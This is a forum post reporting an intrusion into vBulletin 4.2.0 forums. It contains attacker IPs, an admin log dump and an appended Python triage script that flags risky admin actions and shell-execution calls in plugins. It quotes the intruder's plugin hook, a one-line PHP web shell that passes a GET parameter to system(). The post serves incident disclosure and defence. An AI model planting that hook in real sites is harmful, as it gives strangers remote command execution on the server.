The Archive of Official vBulletin Modifications Site. It is not a VB3 engine, just a parsed copy!
#1
v4.2.0 hacker details
This script kiddy can't handle his hormones and has gone on a rampage.

https://www.google.co.uk/#q=%22ma3kesi%22

Most of the forums are running 4.2.0 (some patch 3). Several hundred (including mine) are showing that username indexed in Google in the past week.

IP addresses found in my adminlog table (you can search them yourself), from Indonesia/Burma:
203.81.72.83
101.255.62.233

Email (I think not real; they didn't need a real email once inside): ma3kesi@mm.com

Block these IPs, they are frequently used for all types of attacks (even on Gmail and Facebook).

What they did. From the adminlog (descending, so first actions at the bottom). Column headers: `adminlogid`, `userid`, `dateline`, `script`, `action`, `extrainfo`, `ipaddress`

Code:
(7627, 1920, 1379801626, 'user.php', 'modify', '', '203.81.72.83'),
(7626, 1920, 1379801594, 'user.php', 'find', '', '203.81.72.83'),
(7625, 1920, 1379801583, 'user.php', 'find', '', '203.81.72.83'),
(7624, 1920, 1379801578, 'user.php', 'modify', '', '203.81.72.83'),
(7623, 1920, 1379801565, 'user.php', 'add', '', '203.81.72.83'),
(7622, 1920, 1379801447, 'plugin.php', '', '', '203.81.72.83'),
(7621, 1920, 1379801445, 'plugin.php', 'kill', 'plugin id = 40', '203.81.72.83'),
(7620, 1920, 1379801443, 'plugin.php', 'delete', 'plugin id = 40', '203.81.72.83'),
(7619, 1920, 1379801438, 'plugin.php', '', '', '203.81.72.83'),
(7618, 1920, 1379801436, 'plugin.php', 'kill', 'plugin id = 42', '203.81.72.83'),
(7617, 1920, 1379801434, 'plugin.php', 'delete', 'plugin id = 42', '203.81.72.83'),
(7616, 1920, 1379801428, 'plugin.php', '', '', '203.81.72.83'),
(7615, 1920, 1379801426, 'plugin.php', 'kill', 'plugin id = 41', '203.81.72.83'),
(7614, 1920, 1379801424, 'plugin.php', 'delete', 'plugin id = 41', '203.81.72.83'),
(7613, 1920, 1379801410, 'plugin.php', 'modify', '', '203.81.72.83'),
(7612, 1920, 1379801373, 'options.php', 'options', '', '203.81.72.83'),
(7611, 1920, 1379801371, 'options.php', 'dooptions', '', '203.81.72.83'),
(7610, 1920, 1379801359, 'options.php', 'options', '', '203.81.72.83'),
(7609, 1920, 1379801279, 'options.php', 'options', '', '203.81.72.83'),
(7608, 1920, 1379801226, 'options.php', 'options', '', '203.81.72.83'),
(7607, 1920, 1379801224, 'options.php', 'dooptions', '', '203.81.72.83'),
(7606, 1920, 1379801181, 'options.php', 'options', '', '203.81.72.83'),
(7605, 1920, 1379801180, 'options.php', 'dooptions', '', '203.81.72.83'),
(7604, 1920, 1379801144, 'options.php', 'options', '', '203.81.72.83'),
(7603, 1920, 1379801125, 'options.php', '', '', '203.81.72.83'),
(7602, 1920, 1379801038, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7601, 1920, 1379801023, 'user.php', 'modify', '', '203.81.72.83'),
(7600, 1920, 1379801021, 'user.php', 'kill', 'user id = 1919', '203.81.72.83'),
(7599, 1920, 1379801016, 'user.php', 'remove', 'user id = 1919', '203.81.72.83'),
(7598, 1920, 1379801011, 'user.php', 'edit', 'user id = 1919', '203.81.72.83'),
(7597, 1920, 1379801005, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7596, 1920, 1379800998, 'user.php', 'modify', '', '203.81.72.83'),
(7595, 1920, 1379800996, 'user.php', 'kill', 'user id = 1', '203.81.72.83'),
(7594, 1920, 1379800993, 'user.php', 'remove', 'user id = 1', '203.81.72.83'),
(7593, 1920, 1379800978, 'user.php', 'edit', 'user id = 1', '203.81.72.83'),
(7592, 1920, 1379800969, 'user.php', 'dopruneusers', '', '203.81.72.83'),
(7591, 1920, 1379800891, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7590, 1920, 1379800870, 'user.php', 'find', '', '203.81.72.83'),
(7589, 1920, 1379800860, 'user.php', 'modify', 'user id = 1', '203.81.72.83'),
(7588, 1920, 1379800858, 'user.php', 'update', 'user id = 1', '203.81.72.83'),
(7587, 1920, 1379800838, 'user.php', 'edit', 'user id = 1', '203.81.72.83'),
(7586, 1920, 1379800807, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7585, 1920, 1379800798, 'user.php', 'prune', '', '203.81.72.83'),
(7584, 1920, 1379800796, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7583, 1920, 1379800786, 'user.php', 'prune', '', '203.81.72.83'),
(7582, 1920, 1379800784, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7581, 1920, 1379800783, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7580, 1920, 1379800781, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7579, 1920, 1379800779, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7578, 1920, 1379800777, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7577, 1920, 1379800775, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7576, 1920, 1379800773, 'user.php', 'dopruneusers', '', '203.81.72.83'),
(7575, 1920, 1379800628, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7574, 1920, 1379800602, 'user.php', 'prune', '', '203.81.72.83'),
(7573, 1920, 1379800585, 'banning.php', 'dobanuser', 'username = mikey', '203.81.72.83'),
(7572, 1920, 1379800556, 'banning.php', 'banuser', '', '203.81.72.83'),
(7571, 1920, 1379800485, 'plugin.php', 'updateactive', '', '203.81.72.83'),
(7570, 1920, 1379800467, 'plugin.php', '', '', '203.81.72.83'),
(7569, 1920, 1379800465, 'plugin.php', 'kill', 'plugin id = 18', '203.81.72.83'),
(7568, 1920, 1379800462, 'plugin.php', 'delete', 'plugin id = 18', '203.81.72.83'),
(7567, 1920, 1379800445, 'plugin.php', '', '', '203.81.72.83'),
(7566, 1920, 1379800443, 'plugin.php', 'kill', 'plugin id = 17', '203.81.72.83'),
(7565, 1920, 1379800441, 'plugin.php', 'delete', 'plugin id = 17', '203.81.72.83'),
(7564, 1920, 1379800421, 'plugin.php', '', '', '203.81.72.83'),
(7563, 1920, 1379800420, 'plugin.php', 'kill', 'plugin id = 51', '203.81.72.83'),
(7562, 1920, 1379800416, 'plugin.php', 'delete', 'plugin id = 51', '203.81.72.83'),
(7561, 1920, 1379800412, 'plugin.php', 'modify', '', '203.81.72.83'),
(7560, 1920, 1379800376, 'navigation.php', 'list', 'navid = 0, tabid = 2', '203.81.72.83'),
(7559, 1920, 1379800371, 'navigation.php', 'update', 'navid = 0, tabid = 2', '203.81.72.83'),
(7558, 1920, 1379800363, 'navigation.php', 'list', 'navid = 0, tabid = 2', '203.81.72.83'),
(7557, 1920, 1379800361, 'navigation.php', 'dodefault', 'navid = 0, tabid = 0', '203.81.72.83'),
(7556, 1920, 1379800359, 'navigation.php', 'default', 'navid = 2, tabid = 0', '203.81.72.83'),
(7555, 1920, 1379800351, 'navigation.php', 'list', 'navid = 0, tabid = 1', '203.81.72.83'),
(7554, 1920, 1379800349, 'navigation.php', 'update', 'navid = 0, tabid = 1', '203.81.72.83'),
(7553, 1920, 1379800343, 'navigation.php', 'list', 'navid = 0, tabid = 1', '203.81.72.83'),
(7552, 1920, 1379800341, 'navigation.php', 'dodefault', 'navid = 0, tabid = 0', '203.81.72.83'),
(7551, 1920, 1379800338, 'navigation.php', 'default', 'navid = 75, tabid = 0', '203.81.72.83'),
(7550, 1920, 1379800283, 'navigation.php', 'list', 'navid = 0, tabid = 1', '203.81.72.83'),
(7549, 1920, 1379800281, 'navigation.php', 'dodefault', 'navid = 0, tabid = 0', '203.81.72.83'),
(7548, 1920, 1379800278, 'navigation.php', 'default', 'navid = 1, tabid = 0', '203.81.72.83'),
(7547, 1920, 1379800273, 'navigation.php', 'list', 'navid = 0, tabid = 0', '203.81.72.83'),
(7546, 1920, 1379800181, 'template.php', 'updatetemplate', 'style id = 3', '203.81.72.83'),
(7545, 1920, 1379800170, 'template.php', 'edit', 'style id = 0', '203.81.72.83'),
(7544, 1920, 1379800166, 'template.php', 'modify', '', '203.81.72.83'),
(7543, 1920, 1379800156, 'template.php', 'modify', '', '203.81.72.83'),
(7542, 1920, 1379800151, 'template.php', 'modify', '', '203.81.72.83'),
(7541, 1920, 1379800099, 'plugin.php', '', '', '203.81.72.83'),
(7540, 1920, 1379800091, 'plugin.php', 'update', '', '203.81.72.83'),
(7539, 1920, 1379800067, 'plugin.php', 'add', '', '203.81.72.83'),
(7531, 1919, 1379796618, 'plugin.php', 'updateactive', '', '101.255.62.233'),
(7530, 1919, 1379796615, 'plugin.php', '', '', '101.255.62.233'),
(7529, 1919, 1379796615, 'plugin.php', 'doimport', '', '101.255.62.233'),
(7528, 1919, 1379796603, 'plugin.php', 'files', '', '101.255.62.233');

They inserted this plugin (it was id=52 for me):

Code:
(52, 'lol', 'ajax_complete', 'if(isset($_GET[''lol''])){echo\r\n"<h1>lol</h1><pre>"; system($_GET\r\n[''lol'']);exit;}', 'vbulletin', '', 1, 5);

Initially they did change the main forum.php file too. I think this was through the admincp option, because there is no sign of FTP access. I'm not a server guy; maybe they got in through SSH. I also have about 550 lines of raw server log data showing what these 2 IPs did. I'm not sure if I should post it or not though. It seems to start with admincp/zxc.php
2 thanks from: Max Taxable, smirkley
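As an added triage example (not code from the post or from vBulletin), the Python below parses rows in the dumped adminlog format quoted above, groups high-risk admin actions (plugin imports, user additions and removals, bans) by source IP while ignoring a trusted admin IP set, and checks a plugin's hook code for shell-execution or eval calls. The sample rows are excerpted from the post's dump plus one constructed benign row from a placeholder trusted IP; the HIGH_RISK action set is this example's own choice and should be adjusted per site.

```python
import re
from collections import defaultdict

# One adminlog row in the INSERT-values form quoted in the post, seven columns:
# (adminlogid, userid, dateline, script, action, extrainfo, ipaddress)
ROW_RE = re.compile(r"\((\d+),\s*(\d+),\s*(\d+),\s*'([^']*)',\s*'([^']*)',"
                    r"\s*'([^']*)',\s*'([^']*)'\)")
FIELDS = ("adminlogid", "userid", "dateline", "script", "action", "extrainfo", "ipaddress")

# Admin actions that install code or change who holds admin access. The set is
# drawn from the actions visible in the post's adminlog; extend it for your site.
HIGH_RISK = {("plugin.php", "doimport"), ("plugin.php", "add"), ("plugin.php", "update"),
             ("user.php", "add"), ("user.php", "remove"), ("user.php", "kill"),
             ("user.php", "dopruneusers"), ("banning.php", "dobanuser")}

# PHP functions that have no place in the hook code of a forum plugin.
DANGEROUS_PHP = re.compile(r"\b(system|exec|shell_exec|passthru|popen|eval|assert)\s*\(")

def parse_adminlog(dump):
    """Parse every adminlog row found in a dumped text into a dict."""
    return [dict(zip(FIELDS, m.groups())) for m in ROW_RE.finditer(dump)]

def triage(dump, trusted_ips):
    """Group high-risk admin actions by source IP, ignoring trusted admin IPs."""
    findings = defaultdict(list)
    for row in parse_adminlog(dump):
        if row["ipaddress"] in trusted_ips:
            continue
        if (row["script"], row["action"]) in HIGH_RISK:
            findings[row["ipaddress"]].append(
                (int(row["adminlogid"]), row["script"], row["action"], row["extrainfo"]))
    return dict(findings)

def suspicious_plugin_code(phpcode):
    """Return the names of shell/eval functions called in a plugin's phpcode."""
    return sorted(set(DANGEROUS_PHP.findall(phpcode)))

# Rows excerpted from the post's dump; the last row is constructed as a benign control.
SAMPLE_ADMINLOG = """
(7528, 1919, 1379796603, 'plugin.php', 'files', '', '101.255.62.233'),
(7529, 1919, 1379796615, 'plugin.php', 'doimport', '', '101.255.62.233'),
(7539, 1920, 1379800067, 'plugin.php', 'add', '', '203.81.72.83'),
(7594, 1920, 1379800993, 'user.php', 'remove', 'user id = 1', '203.81.72.83'),
(7600, 1920, 1379801021, 'user.php', 'kill', 'user id = 1919', '203.81.72.83'),
(7700, 1, 1379900000, 'plugin.php', 'add', '', '192.0.2.10');
"""
# Hook body of the rogue plugin from the post, with the dump's '' quoting undone.
ROGUE_PLUGIN = """if(isset($_GET['lol'])){echo "<h1>lol</h1><pre>"; system($_GET['lol']);exit;}"""
TRUSTED_IPS = {"192.0.2.10"}  # placeholder: replace with your own admin IPs
if __name__ == "__main__":
    print(triage(SAMPLE_ADMINLOG, TRUSTED_IPS), suspicious_plugin_code(ROGUE_PLUGIN))
```

Run against a full `SELECT ... FROM adminlog` dump, the per-IP grouping makes the two attacker sessions in the post stand out immediately; the plugin check is worth running over every row of the `plugin` table, not only the one you already suspect.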